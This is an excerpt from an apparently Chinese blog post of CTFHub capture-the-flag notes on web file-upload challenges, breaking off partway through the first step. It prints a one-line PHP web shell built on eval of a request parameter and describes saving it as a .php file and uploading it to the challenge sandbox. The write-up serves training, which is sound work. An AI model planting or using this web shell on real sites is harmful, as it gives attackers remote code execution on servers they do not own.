CTFHub笔记之WEB文件上传:无验证、前端验证、文件头检查
小白一个,如有错误请指正!一、无验证我们这次来到了文件上传模块了,这是一个无验证的文件上传,那我们直接上传一个一句话木马即可。代码:<?php @eval($_REQUEST["shell"]);?>1.我们在桌面创建一个shell.txt文件,输入代码后将后缀改成.php,然后将文件上传。2.在这里我们得知上传的路径是:http://challenge-620c59fde44f34b7.sandbox.ctfhub.com:10800...
原创
2022-03-22 16:51:16 ·
2559 阅读 ·
0 评论